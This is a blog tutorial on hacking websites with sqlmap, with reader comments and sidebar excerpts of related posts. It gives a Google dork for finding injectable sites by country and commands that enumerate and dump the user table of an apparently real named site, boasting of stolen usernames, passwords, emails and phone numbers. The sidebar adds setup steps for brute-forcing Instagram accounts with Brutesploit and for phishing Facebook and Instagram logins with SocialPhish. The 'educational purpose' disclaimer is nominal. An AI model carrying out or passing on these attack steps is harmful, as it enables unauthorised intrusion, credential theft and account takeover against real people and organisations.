Hacking a website using SQL injection (Using SQL Map)

-

In this tutorial we will learn how easy it is to hack a website using SQL map script. 💻

The only required thing to conduct this attack is SQL map script. You can download that from:

http://sqlmap.org/

Before beginning the first thing we have to check is if the website is vulnerable for SQL injection attack or not. Here Google will be our friend. We can search the following in order to get websites to check the vulnerability for attack.

inurl:.php?id= site:.bd

We can use .bd to search for bangladesh websites, .pk for Pakisthani websites, .in for Indian websites etc.

In this I have taken a .bd website and I received the following outcome.



Lets open the first result and after the url put a ' and hit enter. If you get an error the website is vulnerable for SQL injection attack. For this website I got the error.

Lets begin the attack and navigate to the folder in which we have the SQL map script. If your script is on the desktop or Downloads you have to change the directory to start.

In my case it was on Desktop so the command will be as follows:

cd Desktop (to change the directory to desktop)

cd sqlmapproject-sqlmap-a42ec7d (to change it to script).


Step 1:

Now as we are in the correct directory and aware that the website is vulnerable we will check the database available. For that we will enter the following command:

python .\sqlmap.py -u "http://kyanc.edu.bd/page.php?id=10" --dbs

We used --dbs to check the database available.

Here we get the following response:



Here we received 2 available databases

[*] kyancedu_kydb

[*] information_schema


Step 2:

Now as we have the databases we can check the tables available in the databases by specifying the database name and requesting the tables name available using the following command:

 Lets check the first one and see the tables available in kyancedu_kydb. We will replace the --dbs with -D kyancedu_kydb which is our database name and add --tables to find the tables in this database.

Lets enter the command:

python .\sqlmap.py -u "http://kyanc.edu.bd/page.php?id=10" -D kyancedu_kydb --tables.

We got the following response:



Here we have got the tables name and now we will use some common sense and see where we can find the required information. It is usually stored in user or admin. 

Step 3:

Now as we have both database and table name, we will check the content in the tables by specifying the dbs and table info we got in the previous commands and request the dump by adding --dump in the command. Our command will look like this:

python .\sqlmap.py -u "http://kyanc.edu.bd/page.php?id=10" -D kyancedu_kydb -T user --dump

We will get the entries in the user table and will look like follows:




 Boom! We have the username, password, email , phone number etc.

😎✌ 😎✌ 😎✌ 😎✌ 😎✌ 😎✌ 😎✌ 😎✌ 😎✌ 😎✌

This attack is just for educational purpose and should not be misused, Its for people to know how easy it is for a hacker to get the details in few click in less than 2 minutes.

Learn the skill, Think twice and act wise 

Rest you know better  😈

Comments

  1. Unknown24 September 2020 at 06:32

    Not bad

    ReplyDelete
  2. Unknown24 September 2020 at 06:34

    Really very informative!!!

    ReplyDelete
  3. Unknown24 September 2020 at 06:34

    Thats really great!

    ReplyDelete
  4. Unknown24 September 2020 at 06:35

    Thank You very Much!! 🙏

    ReplyDelete
  5. Anonymous24 September 2020 at 06:56

    Nice

    ReplyDelete
  6. Unknown24 September 2020 at 07:08

    Very interesting , good job and thanks for sharing such a good information.

    ReplyDelete
  7. Anon24 September 2020 at 07:32

    Really informative content. Even after 2 decades SQL injections still haunt developers.

    ReplyDelete
  8. Unknown24 September 2020 at 09:55

    Great! Thanks.

    ReplyDelete
  9. Unknown24 September 2020 at 11:15

    Very informative content . Great thankx ..!!

    ReplyDelete
  10. Unknown24 September 2020 at 12:08

    Good job,thanks bro

    ReplyDelete
  11. Unknown24 September 2020 at 16:59

    This is awesome and helpful.. Thanq so much 😇

    ReplyDelete
  12. Unknown24 September 2020 at 20:39

    I understood everything..Thanks

    ReplyDelete
  13. Sujet25 September 2020 at 07:33

    Thank you all for your support.

    ReplyDelete
  14. Rohit26 September 2020 at 07:03

    Thanks Bro Really Helped me

    ReplyDelete
  15. msanandhu28 September 2020 at 03:52

    Really helpful.

    ReplyDelete
  16. Unknown30 September 2020 at 08:28

    Thats great..

    ReplyDelete
  17. Unknown30 September 2020 at 08:28

    Thats great..

    ReplyDelete
  18. Unknown14 October 2020 at 23:58

    Good work very helpful..

    ReplyDelete
  19. Unknown25 October 2020 at 06:14

    Nice, Thanks, keep posting

    ReplyDelete
  20. devin124 May 2021 at 05:06

    This is really too useful and have more ideas and keep sharing many techniques I really learned something new thanks for giving this information. We updated all the trending new information related to any topics.
    To be more updated about all the news around you, you can check this website
    www royal enfield classic 350


    ReplyDelete

Post a Comment

Popular posts from this blog

Hacking Instagram using Brutesploit

-
Image
  Hacking Instagram using Brutesploit   (Brute force attack) In this tutorial we will see how we can hack an Instagram account using Brutesploit, This will be brute force attack, In simple terms we will try different password and hope we get the correct one. Requirements 1. Kali Linux installed system 2. Victim's Instagram username. 3. A little bit social-engineering. 4. Password list file and proxy list file. (we can download it online) 5. Lot of patience. Step 1 First step is to we have to open terminal in kali linux and get Brutesploit to our system using the following command.   1.  git clone https://github.com/Screetsec/Brutesploit.git (To get Brutesploit on your machine)   2. cd Brutesploit (change the directory to Brutesploit)   3. chmod +x Brutesploit (To change permission)   4. sudo ./Brutesploit or sudo su ./Brutesploit (To launch Brutesploit) Step 2 You will get the following screen when you write the fourth command in the terminal.   If you get this screen then we are
Read more

Social Phish for Hacking Instagram or Facebook Account

-
Image
 Social Phish for Hacking Instagram or Facebook Account   Here we will see how we can hack Instagram or Facebook account using Social Phish on Kali linux .   Requirments  1. Kali Linux installed system 2. Victim  3. A little bit social-engineering. Step 1 Open terminal on your kali-linux and type the following commands: a). git clone https://github.com/xHak9x/SocialPhish.git  (To get socialphish on your machine)   b). cd SocialPhish (change the directory to socialphish)   c). chmod +x socialphish.sh (To change permission)   d). ./socialphish.sh (To launch the programe)   Once you type in the above mentioned commands you will see this on your screen.   Now we need to choose any option lets say 01 or 02. We can choose any mentioned in the list. Here I will select Instagram and I will mention 01.   Once we select we will get the following 2 options. 1. Serveo.net 2. Ngrok  Now select 02 and press enter and once you type in 02 and press enter it will download Ngrok. It  will provide 2 link
Read more